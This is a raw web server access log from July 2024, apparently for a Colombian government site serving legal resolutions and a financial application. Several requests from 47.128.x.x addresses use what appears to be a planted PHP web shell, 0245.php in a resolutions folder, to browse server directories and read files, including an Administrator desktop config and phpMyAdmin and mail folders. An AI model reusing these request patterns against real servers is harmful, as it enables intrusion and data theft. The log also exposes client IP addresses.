216.245.221.92 - - [15/Jul/2024:06:17:52 -0500] "HEAD / HTTP/1.1" 200 -
47.128.21.197 - - [15/Jul/2024:06:17:57 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=3964.pdf&ft=img HTTP/1.1" 200 15950
201.245.192.253 - - [15/Jul/2024:06:18:00 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.119.72 - - [15/Jul/2024:06:18:07 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=incendios-forestales-en-la-orinoquia-colombo-venezolana-y-en-los-llanos-orientales-afectan-la-calidad-del-aire-de-bogota.html HTTP/1.1" 200 2815
181.53.12.168 - - [15/Jul/2024:06:18:04 -0500] "POST /sipse/faces/presentacion/financiero/solicitudBienServicio/asociarBienServicioSolicitud.xhtml HTTP/1.1" 200 2720
216.244.66.195 - - [15/Jul/2024:06:18:11 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/2484.pdf HTTP/1.1" 200 287904
181.53.12.168 - - [15/Jul/2024:06:18:14 -0500] "POST /sipse/faces/presentacion/financiero/solicitudBienServicio/asociarBienServicioSolicitud.xhtml HTTP/1.1" 200 78314
181.53.12.168 - - [15/Jul/2024:06:18:14 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
181.53.12.168 - - [15/Jul/2024:06:18:14 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.168 - - [15/Jul/2024:06:18:14 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.168 - - [15/Jul/2024:06:18:14 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.168 - - [15/Jul/2024:06:18:14 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.168 - - [15/Jul/2024:06:18:14 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.168 - - [15/Jul/2024:06:18:14 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
209.38.33.11 - - [15/Jul/2024:06:18:16 -0500] "GET / HTTP/1.1" 200 319
47.128.40.153 - - [15/Jul/2024:06:18:17 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CMercuryMail&f=fsynonym.exe&ft=info HTTP/1.1" 200 3626
181.53.12.168 - - [15/Jul/2024:06:18:17 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/crearModificarSolicitudProceso.xhtml HTTP/1.1" 200 65645
181.53.12.168 - - [15/Jul/2024:06:18:22 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
181.53.12.168 - - [15/Jul/2024:06:18:22 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.168 - - [15/Jul/2024:06:18:22 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.168 - - [15/Jul/2024:06:18:22 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.168 - - [15/Jul/2024:06:18:22 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.168 - - [15/Jul/2024:06:18:22 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.168 - - [15/Jul/2024:06:18:22 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.168 - - [15/Jul/2024:06:18:22 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1556
181.53.12.168 - - [15/Jul/2024:06:18:28 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.168 - - [15/Jul/2024:06:18:28 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
181.53.12.168 - - [15/Jul/2024:06:18:28 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.168 - - [15/Jul/2024:06:18:27 -0500] "GET /sipse/faces/presentacion/financiero/solicitudProceso/crearModificarSolicitudProceso.xhtml HTTP/1.1" 200 83828
181.53.12.168 - - [15/Jul/2024:06:18:28 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.168 - - [15/Jul/2024:06:18:28 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.168 - - [15/Jul/2024:06:18:28 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.168 - - [15/Jul/2024:06:18:28 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
47.128.120.129 - - [15/Jul/2024:06:18:28 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Cxampp%5C&f=guestbook-en.pl&ft=img&imgsize=100 HTTP/1.1" 200 14632
172.22.2.4 - - [15/Jul/2024:06:16:54 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
47.128.119.90 - - [15/Jul/2024:06:18:38 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=C%3A%5CUsers%5CAdministrator%5CDesktop&f=httpd-xampp.conf.txt&ft=info HTTP/1.1" 200 3696
66.249.66.20 - - [15/Jul/2024:06:18:44 -0500] "GET /robots.txt HTTP/1.1" 404 1018
66.249.66.21 - - [15/Jul/2024:06:18:44 -0500] "GET /BLA/resoluciones/RESOLUCIONES%201995/0267.pdf HTTP/1.1" 200 40854
47.128.26.65 - - [15/Jul/2024:06:18:48 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2%5C&f=favicon.ico&white=1 HTTP/1.1" 200 18902
66.249.66.20 - - [15/Jul/2024:06:18:51 -0500] "GET /Publicaciones/2023EE235412.pdf HTTP/1.1" 404 228
